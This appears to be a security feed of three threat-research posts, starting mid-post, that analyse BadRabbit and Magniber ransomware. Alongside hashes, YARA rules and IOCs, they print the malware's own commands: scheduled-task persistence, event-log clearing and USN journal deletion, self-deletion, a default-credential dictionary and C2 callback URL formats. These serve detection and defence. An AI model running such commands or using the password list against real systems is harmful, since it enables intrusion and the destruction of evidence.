Product Detection Names
NX,EX,AX,FX,ETP malware.binary.exe,
Trojan.Ransomware.MVX, Exploit.PossibleWaterhole.BACKSWING
HX BADRABBIT RANSOMWARE (FAMILY),
Gen:Heur.Ransom.BadRabbit.1,
Gen:Variant.Ransom.BadRabbit.1
TAP WINDOWS METHODOLOGY [Scheduled Task
Created], WINDOWS METHODOLOGY [Service Installation], WINDOWS
METHODOLOGY [Audit Log Cleared], WINDOWS METHODOLOGY [Rundll32
Ordinal Arg], WINDOWS METHODOLOGY [Wevtutil Clear-log],
WINDOWS METHODOLOGY [Fsutil USN Deletejournal], WINDOWS
METHODOLOGY [Multiple Admin Share Failures]

We would like to thank Edward Fjellskål for his assistance with
research for this blog.

Indicators

File: Install_flashPlayer.exe
Hash:
FBBDC39AF1139AEBBA4DA004475E8839
Description:
install_flashplayer.exe drops infpub.dat

File: infpub.dat
Hash: 1D724F95C61F1055F0D02C2154BBCCD3
Description: Primary ransomware component

File: dispci.exe
Hash: B14D8FAF7F0CBCFAD051CEFE5F39645F
Description: Interacts with the DiskCryptor driver (cscc.dat) to
install the malicious bootloader, responsible for file decryption.

File: cscc.dat
Hash: B4E6D97DAFD9224ED9A547D52C26CE02 or
EDB72F4A46C39452D1A5414F7D26454A
Description: 32 or 64-bit
DiskCryptor driver

File: .tmp
Hash:
37945C44A897AA42A66ADCAB68F560E0 or
347AC3B6B791054DE3E5720A7144A977
Description: 32 or 64-bit
Mimikatz variant

File: Readme.txt
Hash: Variable
Description: Ransom note

Command: system32rundll32.exe C:Windowsinfpub.dat,#1 15
Description: Runs the primary ransomware component of BADRABBIT. Note
that “15” is the default value present in the malware and may be
altered by specifying a different value on command line when executing install_flash_player.exe.

Command: %COMSPEC% /c schtasks /Create /RU SYSTEM /SC ONSTART /TN
rhaegal /TR “<%COMSPEC%> /C Start “”
“” -id
Description: Creates
the rhaegal scheduled task

Command: %COMSPEC% /c schtasks /Create /SC once /TN drogon /RU
SYSTEM /TR “%WINDIR%system32shutdown.exe /r /t 0 /f” /ST

Description: Creates the drogon scheduled task

Command: %COMSPEC% /c schtasks /Delete /F /TN drogon
Description: Deletes the drogon scheduled task

Command: %COMSPEC% /c wswevtutil cl Setup & wswevtutil cl System
& wswevtutil cl Security & wswevtutil cl Application &
fsutil usn deletejournal /D :
Description: Anti-forensics

Scheduled Task Name: rhaegal
Scheduled Task Run:
“<%COMSPEC%> /C Start “”
“” -id
&& exit”
Description: Bootloader interaction

Scheduled Task Name: drogon
Scheduled Task Run:
“%WINDIR%system32shutdown.exe /r /t 0 /f”
Description: Forces a reboot

Service Name: cscc
Service Display Name: Windows Client Side
Caching DDriver
Service Binary Path: cscc.dat

Embedded usernames from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
Administrator
Admin
Guest
User
User1
user-1
Test
root
buh
boss
ftp
rdp
rdpuser
rdpadmin
manager
support
work
other user
operator
backup
asus
ftpuser
ftpadmin
nas
nasuser
nasadmin
superuser
netguest
alex
Embedded passwords from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
Administrator
administrator
Guest
guest
User
user
Admin
adminTest
test
root
123
1234
12345
123456
1234567
12345678
123456789
1234567890
Administrator123
administrator123
Guest123
guest123
User123
user123
Admin123
admin123Test123
test123
password
111111
55555
77777
777
qwe
qwe123
qwe321
qwer
qwert
qwerty
qwerty123
zxc
zxc123
zxc321
zxcv
uiop
123321
321
love
secret
sex
god
Embedded pipe names from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
atsvc
browser
eventlog
lsarpc
netlogon
ntsvcs
spoolss
samr
srvsvc
scerpc
svcctl
wkssvc

Yara Rules

rule FE_Hunting_BADRABBIT {
meta:version=”.2″
filetype=”PE”
author=”ian.ahl
@TekDefense & nicholas.carr @itsreallynick”
date=”2017-10-24″
md5 =
“b14d8faf7f0cbcfad051cefe5f39645f”
strings:
// Messages
$msg1 =
“Incorrect password” nocase ascii wide
$msg2 = “Oops! Your files have been encrypted.”
ascii wide
$msg3 = “If you see this text,
your files are no longer accessible.” ascii wide
$msg4 = “You might have been looking for a way to
recover your files.” ascii wide
$msg5 =
“Don’t waste your time. No one will be able to recover
them without our” ascii wide
$msg6 =
“Visit our web service at” ascii wide
$msg7 = “Your personal installation key#1:” ascii
wide
$msg8 = “Run DECRYPT app at your
desktop after system boot” ascii wide
$msg9
= “Password#1” nocase ascii wide
$msg10 = “caforssztxqzf2nm.onion” nocase ascii
wide
$msg11 = /partition (unbootable|not
(found|mounted))/ nocase ascii wide

// File
references
$fref1 =
“C:\Windows\cscc.dat” nocase ascii wide
$fref2 = “\\.\dcrypt” nocase ascii wide
$fref3 = “Readme.txt” ascii wide
$fref4 = “\Desktop\DECRYPT.lnk” nocase ascii
wide
$fref5 = “dispci.exe” nocase
ascii wide
$fref6 =
“C:\Windows\infpub.dat” nocase ascii wide
// META
$meta1 =
“http://diskcryptor.net/” nocase ascii wide
$meta2 = “dispci.exe” nocase ascii wide
$meta3 = “GrayWorm” ascii wide
$meta4 = “viserion” nocase ascii wide
//commands
$com1 = “ComSpec” ascii
wide
$com2 = “\cmd.exe” nocase ascii
wide
$com3 = “schtasks /Create” nocase
ascii wide
$com4 = “schtasks /Delete /F /TN
%ws” nocase ascii wide
condition:
(uint16(0) == 0x5A4D)
and
(8 of
($msg*) and 3 of ($fref*) and 2 of ($com*))
or
(all of ($meta*) and 8 of ($msg*))

rule FE_Trojan_BADRABBIT_DROPPER
{
meta:
author =
“muhammad.umair”
md5 =
“fbbdc39af1139aebba4da004475e8839”
rev = 1
strings:
$api1 =
“GetSystemDirectoryW” fullword
$api2 = “GetModuleFileNameW” fullword
$dropped_dll = “infpub.dat” ascii fullword
wide
$exec_fmt_str = “%ws
C:\Windows\%ws,#1 %ws” ascii fullword wide
$extract_seq = { 68 ?? ?? ?? ?? 8D 95 E4 F9 FF FF 52 FF
15 ?? ?? ?? ?? 85 C0 0F 84 C4 00 00 00 8D 85 A8 ED FF FF 50 8D
8D AC ED FF FF E8 ?? ?? ?? ?? 85 C0 0F 84 AA 00 00 00 }
condition:
(uint16(0) == 0x5A4D and
uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB
and all of them
}

rule
FE_Worm_BADRABBIT
{
meta:
author = “muhammad.umair”
md5 = “1d724f95c61f1055f0d02c2154bbccd3”
rev = 1
strings:
$api1 =
“WNetAddConnection2W” fullword
$api2 = “CredEnumerateW” fullword
$api3 = “DuplicateTokenEx” fullword
$api4 = “GetIpNetTable”
$del_tasks = “schtasks /Delete /F /TN drogon” ascii
fullword wide
$dropped_driver =
“cscc.dat” ascii fullword wide
$exec_fmt_str = “%ws C:\Windows\%ws,#1 %ws” ascii
fullword wide
$iter_encrypt = { 8D 44 24 3C
50 FF 15 ?? ?? ?? ?? 8D 4C 24 3C 8D 51 02 66 8B 31 83 C1 02 66
3B F7 75 F5 2B CA D1 F9 8D 4C 4C 3C 3B C1 74 07 E8 ?? ?? ?? ??
}
$share_fmt_str =
“\\%ws\admin$\%ws” ascii fullword wide
condition:
(uint16(0) == 0x5A4D and
uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB
and all of them
}

rule
FE_Trojan_BADRABBIT_MIMIKATZ
{
meta:
author =
“muhammad.umair”
md5 =
“37945c44a897aa42a66adcab68f560e0”
rev = 1
strings:
$api1 =
“WriteProcessMemory” fullword
$api2 = “SetSecurityDescriptorDacl” fullword
$api_str1 = “BCryptDecrypt” ascii fullword
wide
$mimi_str = “CredentialKeys”
ascii fullword wide
$wait_pipe_seq = { FF 15
?? ?? ?? ?? 85 C0 74 63 55 BD B8 0B 00 00 57 57 6A 03 8D 44 24
1C 50 57 68 00 00 00 C0 FF 74 24 38 4B FF 15 ?? ?? ?? ?? 8B F0
83 FE FF 75 3B }
condition:
(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)
and filesize < 500KB and all of them
}

rule FE_Trojan_BADRABBIT_DISKENCRYPTOR
{
meta:
author =
“muhammad.umair”
md5 =
“b14d8faf7f0cbcfad051cefe5f39645f”
rev = 1
strings:
$api1 =
“CryptAcquireContextW” fullword
$api2 = “CryptEncrypt” fullword
$api3 = “NetWkstaGetInfo” fullword
$decrypt_seq = { 89 5D EC 78 10 7F 07 3D 00 00 00 01 76 07 B8
00 00 00 01 EB 07 C7 45 EC 01 00 00 00 53 50 53 6A 04 53 8B F8
56 89 45 FC 89 7D E8 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 5F
}
$msg1 = “Disk decryption
progress…” ascii fullword wide
$task_fmt_str = “schtasks /Create /SC ONCE /TN
viserion_%u /RU SYSTEM /TR “%ws” /ST
%02d:%02d:00″ ascii fullword wide
$tok1
= “\\.\dcrypt” ascii fullword wide
$tok2 = “C:\Windows\cscc.dat” ascii fullword
wide
condition:
(uint16(0) ==
0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize
< 150KB and all of them
}

Go to Source
Author: Barry Vengerik

BadRabbit: a closer look at the new version of Petya/NotPetya

Petya/NotPetya (aka EternalPetya), made headlines in June, attacking users around the world. Today, we noted an outbreak of a similar-looking malware, called BadRabbit, probably prepared by the same authors. Just like the previous edition, BadRabbit has an infector allowing for lateral movements, using SMB to propagate laterally with a hardcoded list of usernames and passwords. However, unlike NotPetya, it doesn’t use EternalBlue and is more widely spread. (Impacted countries include Ukraine, Russia, Turkey, and Bulgaria).

Another key difference between Petya/NotPetya and BadRabbit is that the initial vector is different (a website dropping a fake Flash update). Also, some of its components have been replaced. The malware package is complex, and we will likely dedicate future articles to describing all its features. But let’s have an initial look.

Analyzed samples

Behavioral analysis

The dropper is an executable that pretends to be a Flash update. The malware must run with Administration privileges, but no UAC bypass technique has been deployed— it relies purely on social engineering, trying to convince the user to elevate it. After being run, it drops and deploys the main module in C:Windows directory. This time, it is named infpub.dat. (We can see the analogy to the previous NotPetya outbreak, where the DLL was named perfc.dat):

It is run by the rundll32.exe called with parameters:

"C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15"

Notice that the malware scans computers in the LAN:

Our guess is that the information about the detected machines is used for lateral movements.

The malware also drops other elements in the Windows directory: cscc.dat and dispci.exe

The malware encrypts files with the selected extensions. All the files are encrypted with the same key (the same plaintext gives the same ciphertext).

Below, we demonstrate a visualization of a sample BMP file before and after being encrypted by BadRabbit:

It does not change files extensions. The marker indicating that the file has been encrypted is added at the end of the file content—it’s a unicode text: “%encrypted”:

Here’s the dropped ransom note. As before, it’s in TXT format, named Readme.txt:

As NotPetya did before, BadRabbit adds a scheduled task for the system reboot:

After the attack is completed, the system is restarted and the bootlocker screen pops up:

We can clearly see the similarity with the screen that was displayed by Petya/NotPetya:

However, this time there is no fake CHKDSK known from each of the Petya editions.

Following the ransom notes, we see that there are two encryption keys that the victim must get in order to be able to recover the files. The first one is the key to the bootlocker. After unlocking the first stage, the second key is required to unlock the files.

Website for the victim

Last time, the authors of the attack tried to use a single email account to communicate with the victims. Of course, this was unreliable, as they soon lost the access to the account. This time, like most of the ransomware authors, they created a Tor-based webpage. The authors invested more effort in the user experience, and the website contains visual effects, including a ransom note that slowly emerges from colorful, animated text:

After pasting the key from the ransom note, the victim is given an individual bitcoin address:

They also provide a box that can be used for reporting problems.

Inside

This malware has multiple elements. Execution starts in the PE file that is responsible for dropping and installing other elements.

The first component—infpub.dat—is analogical to the perfc.dat known from the NotPetya attack. This time, the DLL exports two functions:

The function at ordinal #1 is deployed first by the main dropper:

This DLL contains an infector that spreads malware into other machines in the LAN. Among other methods, we see WMIC being used to deploy the modules dropped on remote machines. The responsible code looks similar to the analogical elements of Petya/NotPetya:

This time, in addition to the credentials dumped with the help of the Mimikatz-based module, the sample tries to perform a dictionary attack and “guess” some of the passwords for remote logins. The list consists of commonly used passwords:

The same DLL is also responsible for infecting files one by one. Encryption is performed with the help of Windows Crypto API:

Some of the system directories are exempted from the attack:

\Windows
\Program Files
\ProgramData
\AppData

Their list of the attacked extensions looks like the extended version of the list used by Petya/NotPetya:

3ds 7z accdb ai asm asp aspx avhd back bak bmp brw c cab
cc cer cfg conf cpp crt cs ctl cxx dbf der dib disk djvu
doc docx dwg eml fdb gz h hdd hpp hxx iso java jfif jpe 
jpeg jpg js kdbx key mail mdb msg nrg odc odf odg odi odm
odp ods odt ora ost ova ovf p12 p7b p7c pdf pem pfx php 
pmf png ppt pptx ps1 pst pvi py pyc pyw qcow qcow2 rar rb
rtf scm sln sql tar tib tif tiff vb vbox vbs vcb vdi vfd
vhd vhdx vmc vmdk vmsd vmtm vmx vsdx vsv work xls xlsx x
ml xvd zip

The AES key is generated with a cryptographically secure function CryptGenRand.

Then it is passed to the encrypting routine, along with other parameters, such as a hardcoded public key (used later to protect the random key and preserve it in a form that can be decrypted only by the attackers):

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ
+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83
hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpR
hV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdw
H1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW
9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWf
SBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB

This module drops and installs other modules used to carry out other stages of the attack. One of them is a legitimate disk cryptor (cscc.dat). It is dropped and installed as a service:

The random key is later passed to another application that is dropped by this module—dispci.exe. That element is responsible for carrying the operation of encrypting the disk.

That module gets the randomly generated key in the -id parameter:

So, the random AES key is preserved for some time in unencrypted form as a command given to be deployed.

dispci.exe

This module communicates with the dropped driver using appropriate IOCTLs. The dropped driver is a legitimate module used for disk encryption—dispci.exe is made to adopt the driver’s features for malicious purpose. Example:

In its resources, we can find the low-level components that are installed directly to the disk (analogically to the Petya kernel installed by the previous version). The first resource is a bootloader, and the other two are analogical variants of the malicious kernel:

The low-level components: bootloader and kernel

This time the low-lever part looks different than in the case of NotPetya. Fragment of the bootloader:

It seems that authors decided to write their own kernel rather than using the one from Petya. It is also installed in a different position of the disk—at the end rather than at the beginning, as Petya did. The kernel is encrypted using a simple routine:

Conclusion

The code has many overlapping and analogical elements to the code of Petya/NotPetya, which suggests that the authors behind the attack are the same. Again, they tried to compose their malicious bundle out of stolen elements, however, the stolen Petya kernel has been substituted with a more advanced disk crypter in the form of a legitimate driver. It looks like the authors tried to improve upon previous mistakes and finish unfinished business. So far, it seems that in the current release, encrypted data is recoverable after buying the key, which means the BadRabbit attack is not as destructive as the previous one. However, the malware is complex and its detailed analysis will take more time. We will be updating this article with the latest findings.

Users of Malwarebytes for Windows are protected from BadRabbit. It is detected as Ransom.BadRabbit.

Summary about the previous attack, Petya/NotPetya:


This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.

The post BadRabbit: a closer look at the new version of Petya/NotPetya appeared first on Malwarebytes Labs.

Go to Source
Author: Malwarebytes Labs

Magniber Ransomware Wants to Infect Only the Right People

Introduction

Exploit kit (EK) use has been on the decline since late 2016;
however, certain activity remains consistent. The Magnitude Exploit
Kit is one such example that continues to affect users, particularly
in the APAC region.

In Figure 1, which is based on FireEye Dynamic threat Intelligence
(DTI) reports shared in March 2017, we can see the regions affected by
Magnitude EK activity during the last three months of 2016 and the
first three months of 2017.


Figure 1: Magnitude EK distribution as
seen in March 2017

This trend continued until late September 2017, when we saw
Magnitude EK focus primarily on the APAC region, with a large chunk
targeting South Korea. Magnitude EK activity then fell off the radar
until Oct. 15, 2017, when it came back and began focusing solely on
South Korea. Previously it had been distributing Cerber ransomware,
but Cerber distribution has declined (we have also seen a decline of
Cerber being distributed via email) and now it is distributing
ransomware known as Magniber.

Infection

The first reappearance of Magnitude EK on Oct. 15 came as a
malvertising redirection from the domain: fastprofit[.]loan. The
infection chain is shown in Figure 2.


Figure 2: Infection chain

The Magnitude EK landing page consisted of CVE-2016-0189, which was
first reported by FireEye as being used in Neutrino
Exploit Kit
after it was patched. Figure 3 shows the landing
page and CVE usage.


Figure 3: Magnitude EK landing page

As seen previously with Magnitude EK, the payload is downloaded as a
plain EXE (see Figure 4) and domain infrastructure is hosted on the
following server:

“Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6”


Figure 4: Magnitude payload header and
plain MZ response

Payload

In the initial report published
by our colleagues at Trend Micro
, the ransomware being
distributed is referred to as Magniber. These ransomware payloads only
seem to target Korean systems, since they won’t execute if the system
language is not Korean.

Magniber encrypts user data using the AES128. The sample used
(dc2a2b84da359881b9df1ec31d03c715) for this analysis was pulled from
our DTI system when the campaign was active. Of note, this sample
differs from the hash shared publically by Trend Micro, but the two
exhibit the same behavior and share the infection vector, and both
were distributed around the same time.

The malware contains a binary payload in its resource section
encrypted in reverse using RC4. It starts unpacking it from the end of
the buffer to its start. Reverse RC4 decryption keys are 30 bytes long
and also contain non-ASCII characters. They are as follows:

  • dc2a2b84da359881b9df1ec31d03c715 RC4 key:
    • { 0x6b,
      0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06, 0xb0,
      0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83, 0x04,
      0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f }

The malware calls GetSystemDefaultUILanguage, and if the
system language is not Korean, it exits (instructions can be seen in
Figure 5). After unpacking in memory, the malware starts executing the
unpacked payload.


Figure 5: Language check targeted at Korea

A mutex with name “ihsdj” is created to prevent multiple
executions. The payload then generates a pseudorandom 19-character
string based on the CPU clock from multiple GetTickCount calls.
The string is then used to create a file in the user’s %TEMP%
directory (e.g. “xxxxxxxxxxxxxxxxxxx.ihsdj”), which contains
the IV (Initialization Vector) for the AES128 encryption and a copy of
the malware itself with the name “ihsdj.exe”.

Next, the malware constructs 4 URLs for callback. It uses the
19-character long pseudorandom string it generated, and the following
domains to create the URLs:

  • bankme.date
  • jobsnot.services
  • carefit.agency
  • hotdisk.world

In order to evade sandbox systems, the malware checks to see if it’s
running inside a VM and appends the result to the URL callback. It
does this by sandwiching and executing CPUID instructions (shown in
Figure 6) between RDTSC calls, forcing VMEXIT.


Figure 6: CPUID instruction to detect VM presence

The aforementioned VM check is done multiple times to gather the
average execution time of the CPUID, and if the average execution time
is greater than 1000, it considers the system to be a VM. In case the
test fails and the malware thinks the system is a VM, a “1”
is appended at the end of the URL (see Figure 7); otherwise,
“0” is appended. The format of the URL is as follows:

  • http://[19 character pseudorandom string].[callback
    domain]/new[0 or 1]

Examples of this would be:

  • http://7o12813k90oggw10277.bankme[.]date/new1
  • http://4bg8l9095z0287fm1j5.bankme[.]date/new0


Figure 7: Command and control communication

If the malware is executed a second time after encryption, the
callback URL ends in “end0” or “end1” instead of
“new”. An example of this would be:

  • hxxp://j2a3y50mi0a487230v1.bankme[.]date/end1

The malware then starts to encrypt user files on the system,
renaming them by adding a “.ihsdj” extension to the end. The
public key for the AES128 and IV for the sample analyzed are:

  • IV: EP866p5M93wDS513
  • Public Key AES128: S25943n9Gt099y4K

A text file “READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt”
is created in the user’s %TEMP% directory and shown to the user. The
ransom message is shown in Figure 8.


Figure 8: Ransom message for the infected user

The malware also adds scheduled tasks to run its copy from %TEMP%
with compatibility assistant, and loads the user message as follows:

  • schtasks /create /SC MINUTE /MO 15 /tn ihsdj /TR
    “pcalua.exe -a %TEMP%ihsdj.exe
  • schtasks /create /SC
    MINUTE /MO 15 /tn xxxxxxxxxxxxxxxxxxx /TR
    %TEMP%READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt

The malware then issues a command to delete itself after exiting,
using the following local ping to provide delay for the deletion:

  • cmd /c ping localhost -n 3 > nul & del
    C:PATHMALWARE.EXE)

Figure 9 contains the Python code for unpacking the malware payload,
which is encrypted using RC4 in reverse.


Figure 9: Python script for unpacking
malware payload

Conclusion

Ransomware is a significant threat to enterprises. While the current
threat landscape suggests a large portion of attacks are coming from
emails, exploit kits continue to put users at risk – especially those
running old software versions and not using ad blockers. Enterprises
need to make sure their network nodes are fully patched.

IOCs

Malware Sample Hash
  • dc2a2b84da359881b9df1ec31d03c715 (decryption key shared)
Malverstiser Domains
  • fastprofit[.]loan
  • fastprofit[.]me
EK Domain Examples
  • 3e37i982wb90j.fileice[.]services
  • a3co5a8iab2x24g90.helpraw[.]schule
  • 2i1f3aadm8k.putback[.]space
Command and Control Domains
  • 3ee9fuop6ta4d6d60bt.bankme.date
  • 3ee9fuop6ta4d6d60bt.jobsnot.services
  • 3ee9fuop6ta4d6d60bt.carefit.agency
  • 3ee9fuop6ta4d6d60bt.hotdisk.world

Go to Source
Author: Muhammad Umair